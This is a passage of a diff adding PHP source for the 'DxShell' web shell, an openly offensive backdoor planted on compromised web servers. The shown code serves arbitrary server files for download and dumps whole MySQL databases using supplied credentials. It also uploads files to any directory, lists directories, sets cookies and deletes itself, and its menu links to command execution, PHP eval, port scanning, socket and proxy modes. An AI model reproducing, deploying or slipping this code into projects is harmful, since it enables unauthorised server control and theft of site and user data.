ikfPdMLTid0XtA/pblipwEsvGA2twladNE3tGltkoAgUoAXJgEgN/ScjWUoj9U47FlQ0/9JEOXhnljgGxAgnuOZBfCJKAHYC9oBIAhjeEyyWvuwm/cBQv2DOCHjSuUJWp1pnAzzB+xZJ6vQJO7pLEzSn/vRfdSZmxw6eaX0LyrKmggIoC0ImZugeJPXC1HCMAOzofJJnK8pBT0wC1dCNFyCKBX6YJ0poxn6SQwzDR52Bb/TnYmFUPmSXVLAoiyjZGCxPOPZGzT5mjlmpOnHm9wQPtljKDWCRrWSpFbqKkO6XUU6C4WBo9xpCop3JX3zBtsJo/kyWjCKonpRSpUoJm4mCNTJYC1Yp3JqFoOqGyWKUN4pm7Owmu90qDtKkEYqdJm5pqkooGfSob9mKMcpVb/EpJ2Jagf5M59msGNkSpoUBJF6CjJOpair5aPReZ3iUUnH1Fh0VDeIQKaiyWUvs6ijxaSumneYypDsSTFCw00tIHrj6QYW8hTpEXxl6Q2Qmqz+sgwdx355hJBIAQdthB6rRxjOWkE6kR74gXHHqS0doTuqp33Fijqt+THvOq8WCafWRK/4upBKmK9ykAAAOw==',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	Header('Last-Modified: '.gmdate('D, d M Y H:i:s', time()-60*60*24*365).' GMT');   //Date('r'
+	header('Expires: '.gmdate('D, d M Y H:i:s', time()+60*60*24*365).' GMT');
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
+h1				{font-size: 14pt; color: #00B000; background-color: #002000; font-family: Arial Black; font-weight: bold; text-align: center;}
+h2				{font-size: 12pt; color: #00B000; background-color: #002000; font-family: Courier New; text-align: center;}
+h3				{font-size: 12pt; color: #F0F000; background-color: #002000; font-family: Times New Roman; text-align: center;}
+caption			{font-size: 12pt; color: #00FF00; background-color: #000000; font-family: Times New Roman; text-align:center; border-width: 1pt 3pt 1pt 3pt;border-color:#FFFF00;border-style:solid solid dotted solid;padding: 5pt 0pt;}
+td.h2_oneline	{font-size: 12pt; color: #00B000; font-family: Courier New; text-align: center;background-color: #002000; border-right-color:#00FF00;border-right-width:1pt;border-right-style:solid;vertical-align:middle;}
+td.mode_header	{font-size: 16pt; color: #FFFF00; font-family: Courier New; text-align: center;background-color: #002000; vertical-align:middle;}
+table.outset, td.outset	  {border-width:3pt; border-style:outset; border-color: #004000;margin-top: 2pt;vertical-align:middle;}
+table.bord, td.bord, fieldset   {border-width:1pt; border-style:solid; border-color: #003000;vertical-align:middle;}
+hr   {border-width:1pt; border-style:solid; border-color: #005000; text-align: center; width: 90%;}
+textarea.bout 		{border-color: #000000; border-width:0pt; background: #000000; font: 12px verdana, arial, helvetica, sans-serif; color: #00FF00; Scrollbar-Face-color:#000000;Scrollbar-Track-Color: #000000;}
+td.listing	{background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:top;}
+td.linelisting  {background-color: #000500; font-family: Courier New; font-size:8pt; color:#00B000; border-color: #003000;border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;}
+table.linelisting {border-color: #003000;border-width:0pt 1pt; border-style:solid;}
+td.js_floatwin_header {background-color:#003300;font-size:10pt;font-weight:bold;color:#FFFF00;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+td.js_floatwin_body	  {background-color:#000000;font-size:10pt;color:#00B000;border-color: #00FF00;border-width:1pt; border-style:solid;border-collapse:collapse;}
+font.rwx_sticky_bit {color:#FF0000;}
+.highlight_txt		{color: #FFFF00;}
+.achtung			{color: #000000; background-color: #FF0000; font-family: Arial Black; font-size: 14pt; padding:0pt 5pt;}
+
+input 			{font-size: 10pt;font-family: Arial; color: #E0E000; background-color: #000000; border-color:#00FF00 #005000 #005000 #FFFF00; border-width:1pt 1pt 1pt 3pt;border-style:dotted dotted dotted solid; padding-left: 3pt;overflow:hidden;}
+input.radio		{border-width:0pt;color: #FFFF00;}
+input.submit 	{font-size: 12pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #002000; border-color: #00FF00; border-width:0pt 1pt 1pt 0pt; border-style: solid; padding:1pt;letter-spacing:1pt;padding:0pt 2pt;}
+input.bt_Yes 	{font-size: 14pt;font-family: Impact, Arial Black; color :#00FF00; background-color: #005000; border-color: #005000 #005000 #00FF00 #005000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_No 	{font-size: 14pt;font-family: Impact, Arial Black; color :#FF0000; background-color: #500000; border-color: #500000 #500000 #FF0000 #500000; border-width:1pt 1pt 2pt 1pt; border-style: dotted dotted solid dotted; height: 30pt; padding:10pt; margin: 5pt 10pt;}
+input.bt_Yes:Hover 	{color:#000000; background-color:#00FF00;border-bottom-color:#FFFFFF;}
+input.bt_No:Hover 	{color:#000000; background-color:#FF0000;border-bottom-color:#FFFFFF;}
+textarea 		{color:#00FF00; background-color:#001000;border-color:#000000;border-width:0pt;border-style:solid;font-size:10pt;font-family:Arial;Padding:5pt;
+				Scrollbar-Face-Color: #00FF00; Scrollbar-Track-Color: #000500;
+				Scrollbar-Highlight-Color: #00A000;	Scrollbar-3dlight-Color: #00A000; Scrollbar-Shadow-Color: #005000;
+				Scrollbar-Darkshadow-Color: #005000;}
+select			{background-color:#001000;color:#00D000;border-color:#D0D000;border-width:1pt;border-style:solid dotted dotted solid;}
+
+A:Link, A:Visited { color: #00D000;	text-decoration: underline; }
+A.no:Link, A.no:Visited { color: #00D000;	text-decoration: none; }
+A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #00FF00; background-color:#003300; text-decoration: overline; }
+.Hover:Hover {color: #FFFF00; cursor:help;}
+.HoverClick:Hover {color: #FFFF00; cursor:crosshair;}
+span.margin		{margin: 0pt 10pt;}
+td.error {color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;}
+td.warning {color:#000000; background-color: #D00000; font-size: 11pt;}
+font.img_replacer {margin:1pt;padding:1pt;text-decoration: none;border-width:1pt;border-color:#D0D000;border-style:solid;}
+</style>
+
+<?php
+if (in_array($_GET['dxmode'], array('UPL', 'DIR', 'PRT')))
+	{  /* THIS FLOATING WINDOW IS ONLY SET FOR MODES: */?>
+<SCRIPT>
+var dom = document.getElementById?1:0;
+var ie4 = document.all && document.all.item;
+var opera = window.opera; //Opera
+var ie5 = dom && ie4 && !opera;
+var nn4 = document.layers;
+var nn6 = dom && !ie5 && !opera;
+var vers=parseInt(navigator.appVersion);
+var good_browser = (ie5 || ie4);
+function showwin(hdr,txt,w,vis)
+{
+if(good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	var temp =
+	"<TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="+ w +">"
+	+((hdr!='')?("<TR><TD class=js_floatwin_header>"+ hdr + "</TD></TR>"):"")
+	+"<TR><TD class=js_floatwin_body>" + txt + "</TD></TR>"
+	+"</TABLE>";
+
+	if (vis == 1)
+		{
+		obj.innerHTML = temp;
+		obj.style.width = w;
+		hor = document.body.scrollWidth - obj.offsetWidth;
+		posHor = xOffset + evnt.clientX + 10;
+		posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+		posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+		if (posHor<hor)
+			obj.style.posLeft = posHor
+		else
+			obj.style.posLeft = posHor2;
+
+		obj.style.posTop = posVer;
+
+		obj.style.visibility = "visible";
+		}
+		else
+		{
+		obj.style.visibility = "hidden";
+		obj.style.posTop = 0;
+		obj.style.posLeft = 0;
+		}
+	}
+}
+function movewin()
+{
+if (good_browser)
+	{
+	var obj =  document.all('js_floatwin');
+	var evnt = event;
+	var xOffset = document.body.scrollLeft;
+	var yOffset = document.body.scrollTop;
+
+	hor = document.body.scrollWidth - obj.offsetWidth;
+	posHor = xOffset + evnt.clientX + 10;
+	posHor2 = xOffset + evnt.clientX - obj.offsetWidth - 5;
+	posVer = yOffset + evnt.clientY - obj.offsetHeight - 5;
+
+	if (posHor<hor)
+		obj.style.posLeft = posHor
+		else
+		obj.style.posLeft = posHor2;
+
+	obj.style.posTop = posVer;
+	}
+}
+</SCRIPT>
+<?php } /* /END */?>
+
+</head>
+<body>
+<?php
+if ($DXGLOBALSHIT) /* tries to kill all the fucking bug.php pre-output, if ob_clean() failed */
+	{	print str_repeat("\n", 10).'<!--SHIT KILLER-->';
+	print "\n".'</body></a>'.str_repeat('</table>', 5).str_repeat('</div>', 5).str_repeat('</span>', 5).str_repeat('</pre>', 1).str_repeat('</font>', 5).str_repeat('</script>', 2);
+	print "\n".'<TABLE WIDTH=100% BORDER=0  style="position:absolute;z-index:100;top:0pt;left:0pt;width:100%;height:100%;"><tr><td>';
+	print "\n\n\n\n";
+	}
+?>
+
+<div id="js_floatwin" style="z-index:50;position:absolute;left:0;top:0;visibility:hidden"></div>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><a href="<?=DxURL('kill', '');?>&dxmode=WTF" class=no><h1>DxShell<br>v<?=$GLOB['SHELL']['Ver'];?></td>
+	<td>
+<?php
+print "\n".'<div style="margin-right:'.(  ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)?'100':'30'  ).'pt;">';
+print "\n".(  ($DXGLOBALSHIT)?'<font color=#FF0000><b>GLOBALSHIT</b></font> ; ':''  );
+print "\n".DxPrint_ParamState('php_ver', 		phpversion()						).' ; ';
+print "\n".DxPrint_ParamState('php_Safe_Mode', 	$GLOB['PHP']['SafeMode'], '!'		).' ; ';
+print "\n".DxPrint_ParamState('magic_quotes', 	(bool)get_magic_quotes_gpc(), '!'	).' ; ';
+print "\n".DxPrint_ParamState('gZip', 			function_exists('gzencode')			).' ; ';
+print "\n".DxPrint_ParamState('cURL', 			function_exists('curl_version')		).' ; ';
+print "\n".DxPrint_ParamState('MySQL', 			function_exists('mysql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('MsSQL', 			function_exists('mssql_connect')	).' ; ';
+print "\n".DxPrint_ParamState('PostgreSQL', 	function_exists('pg_connect')		).' ; ';
+print "\n".DxPrint_ParamState('Oracle', 		function_exists('ocilogon')			).' ; ';
+print "\n".'Disabled functions: '.((($df=@ini_get('disable_functions'))=='')?'<font color=#00FF00><b>NONE</b></font>':'<font color=#FF0000><b>'.str_replace(array(',',';'), ', ', $df).'</b></font>');
+print "\n".'</div>';
+
+print "\n\n".'<span align=right style="position:absolute;z-index:1;right:0pt;top:0pt;"><table><tr><td class="h2_oneline"><nobr>';
+if ((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2)
+	print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=logoff" title="Log Off" class=no>[Exit]</a>';
+print "\n".'<a href="'.DxURL('kill', 'dxinstant').'&dxinstant=DEL" title="Delete self ('.basename($_SERVER['PHP_SELF']).')" class=no><font color=#FF0000;>'.DxImg('del').'</font></a>';
+print "\n".'</nobr></td></tr></table></span>';
+
+print "\n\n".'<hr>';
+print "\n".'Disk free: <b>'.DxStr_FmtFileSize(disk_free_space($GLOB['FILES']['CurDIR'])).' / '.DxStr_FmtFileSize(disk_total_space($GLOB['FILES']['CurDIR'])).'</b> ; ';
+print "\n".'OS: <b>'.$GLOB['SYS']['OS']['id'].' ('.$GLOB['SYS']['OS']['Full'].' )</b> ; ';
+print "\n".'Yer_IP: <b>'.@$_SERVER['REMOTE_ADDR'].' ('.@$_SERVER['REMOTE_HOST'].')</b> ; ';
+print "\n".'<nobr>Own/U/G/Pid/Inode:<wbr><b>'.get_current_user().' / '.getmyuid().' / '.getmygid().' / '.getmypid().' / '.getmyinode().'</b> ; </nobr>';
+print "\n".'MySQL : <b>'.@mysql_get_server_info().'</b> ; ';
+print "\n".'<br>'.@$_SERVER['SERVER_SOFTWARE'];
+?>
+	</td>
+</table>
+<table width=100% cellspacing=0 cellpadding=0 class=outset>
+<tr>
+	<td width=100pt class=h2_oneline><h2>Modes</td>
+	<td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=DIR">DIR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=F_VIEW">VIEW</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=FTP<?=((!empty($_GET['dxdir']))?'&dxdir='.$_GET['dxdir']:'');?>">FTP</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('leave', 'dxsql_s,dxsql_l,dxsql_p,dxsql_d');?>&dxmode=SQL">SQL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PHP">PHP</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=COOK">COOKIE</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=CMD">CMD</a>
+	<td><font class=highlight_txt><big><b>II</td><td style="text-align:center;"><nobr>
+	<a href="<?=DxURL('kill', '');?>&dxmode=MAIL">MAIL</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=STR">STR</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PRT">PORTSCAN</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=SOCK">SOCK</a> |
+	<a href="<?=DxURL('kill', '');?>&dxmode=PROX">PROXY</a>
+	</td>
+	</tr>
+</table>
+
+<?php $DX_Header_drawn=true; ?>
+
+<?php
+#################################################
+########
+########   DXGLOBALSHIT DOWNLOADER
+########
+if (isset($DxDOWNLOAD_File)) /* only when DXGLOBALSHIT is enabled */
+	{	print "\n".'<table align=center><tr><td class=mode_header><b>Download file</td></tr></table>';
+	print "\n".'The fact you see this means that "'.basename($_SERVER['PHP_SELF']).'" has fucked up the output with it\'s shit, so no headerz could be sent =((';
+	print "\n".'<br>Exclusively, DxShell is proud to present an additional way to download files...Just execute the php-script given below, and it will make the file u\'re trying to download';
+
+	if ($GLOB['SYS']['GZIP']['CanUse'])  $DxDOWNLOAD_File['content']=gzcompress($DxDOWNLOAD_File['content'], 6);
+
+	print "\n\n".'<br><br>';
+	print "\n".'<textarea rows=30 style="width:90%" align=center>';
+	print "\n".'<?php'."\n".' //Execute this, and you\'ll get the requested "'.$DxDOWNLOAD_File['filename'].'" in the same folder with the script ;)';
+	print "\n".'// The file is '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzcompress()ed and':''  ).' base64_encode()ed';
+	print "\n\n".'$encoded_file=\''.base64_encode($DxDOWNLOAD_File['content']).'\';';
+	print "\n\n\n\n";
+	print "\n".'$f=fopen(\''.$DxDOWNLOAD_File['filename'].'\', \'w\');';
+	print "\n".'fputs($f, '.(  ($GLOB['SYS']['GZIP']['CanUse'])?'gzuncompress(base64_decode($encoded_file))':'base64_decode($encoded_file)'  ).');';
+	print "\n".'fclose($f);';
+	print "\n".'//Yahoo, hacker, the file is here =)';
+	print "\n".'?>';
+	print "\n".'</textarea>';
+	die();
+	}
+
+?>
+
+<table align=center>
+	<tr><td class=mode_header>
+	@MODE: <b><?=$GLOB['DxMODES'][$_GET['dxmode']];?>
+	</td></tr></table>
+<?
+
+########
+########   AboutBox
+########
+if ($_GET['dxmode']=='WTF')
+	{
+	?>
+<table align=center class=nooooneblya><tr><td><div align=center>
+<?php
+print '<a href="http://hellknights.void.ru/">'.DxImg('exec').'</a>';
+print '<br>o_O Tync, ICQ# 1227-700';
+?><br><br>
+<textarea name="LolBox" class=bout style="width:500pt; height:500pt;"></textarea></table>
+<SCRIPT language=Javascript><!--
+var tl=new Array(
+"Kilobytes of c0de, litres of beer, kilometers of cigarettes (*no drugs*), and for what purpose?",
+"What's wrong with other shells?",
+"Usability, functionality, bugs?... NO.",
+"The main bug is: these shells ARE NOT mine =)",
+"Just like to be responsible for every motherfucking byte of code.",
+"Enjoy!",
+"-----------------------------------",
+"o_O Tync, http://hellknights.void.ru/, ICQ# 1227-700",
+"DxShell v<?=$GLOB['SHELL']['Ver'].', date '.$GLOB['SHELL']['Date'];?>",
+"",
+"Greetz to: ",
+"iNfantry the Ruler",
+"Nik8 the Hekker",
+"_1nf3ct0r_ the Father",
+"Industry of Death the betatest0r =)",
+"",
+"Thanks to:",
+"Dunhill the cigarettes, Tuborg the beer, PHP the language, Nescafe the Coffee, Psychedelic the Music",
+"",
+"Wartime testers & debuggers ::: =))) :::",
+"MINDGROW",
+"BELLFAGOR",
+"",
+"",
+"Hekk da pl0net!",
+"--- EOF ---"
+);
+var speed=40;var index=0; text_pos=0;var str_length=tl[0].length;var contents, row;
+function type_text()
+{contents='';row=Math.max(0,index-50);
+while(row<index) contents += tl[row++] + '\r\n';
+document.getElementById("LolBox").value = contents + tl[index].substring(0,text_pos)+'|';
+if(text_pos++==str_length)
+	{text_pos=0;index++;
+	if(index!=tl.length)
+	{str_length=tl[index].length;setTimeout("type_text()",1000);
+	}
+	} else setTimeout("type_text()",speed);
+}type_text();
+//-->
+</SCRIPT>
+	<?php
+	}
+
+
+		###################################
+
+########
+########   Upload file
+########
+if ($_GET['dxmode']=='UPL')
+	{
+	if (empty($_POST['dxdir']) AND empty($_GET['dxdir'])) die(DxError('Uploading without selecting directory $_POST/$_GET[\'dxdir\'] is restricted'));
+
+	if (isset($_FILES['dx_uplfile']['tmp_name']))
+		{
+		$GETFILE=file_get_contents($_FILES['dx_uplfile']['tmp_name']);
+		DxFiles_UploadHere($_POST['dxdir'], $_FILES['dx_uplfile']['name'], $GETFILE);
+		}
+		else
+		{
+		print "\n".'<form action="'.DxURL('leave','dxmode,dxsimple').'" enctype="multipart/form-data" method=POST>';
+		print "\n".'<input type="hidden" name="MAX_FILE_SIZE" value="'.$GLOB['PHP']['upload_max_filesize'].'">';
+		print "\n".'<font class="highlight_txt">Max: '.DxStr_FmtFileSize($GLOB['PHP']['upload_max_filesize']).'</font>';
+		print "\n".'<br><input type=text name="dxdir" value="'.$_GET['dxdir'].'" SIZE=50>';
+		print "\n".'<br><input type=file name="dx_uplfile" SIZE=50>';
+		print "\n".'<input type=submit value="Upload" class="submit"></form>';
+		}
+	}
+
+		###################################
+
+########
+########   Directory listings
+########
+if ($_GET['dxmode']=='DIR')
+	{
+	if (empty($_GET['dxdir'])) $_GET['dxdir']=realpath($GLOB['FILES']['CurDIR']);
+	$_GET['dxdir']=DxFileOkaySlashes($_GET['dxdir']);
+	if (substr($_GET['dxdir'], -1,1)!='/') $_GET['dxdir'].='/';
+
+	print "\n".'<br><form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+	DxGETinForm('leave', 'dxmode');
+	print "\n".'<input type=text name="dxdir" value="'.DxFileOkaySlashes(realpath($_GET['dxdir'])).'" SIZE=40>';
+	print "\n".'<input type=submit value="Goto" class="submit"></form>';
+
+	print "\n".'<br>'.'<b>&gt;&gt; <b>'.$_GET['dxdir'].'</b>';
+	if (!file_exists($_GET['dxdir'])) die(DxError('No such directory'));
+	if (!is_dir($_GET['dxdir'])) 	  die(DxError('It\'s a file!! What do you think about listing files in a file? =)) '));
+
+	if (isset($_GET['dxparam']))
+		{		if ($_GET['dxparam']=='mkDIR')  if (	!mkdir($_GET['dxdir'].'__DxS_NEWDIR__'.DxRandomChars(3))	) DxError('Unable to mkDir. Perms?');
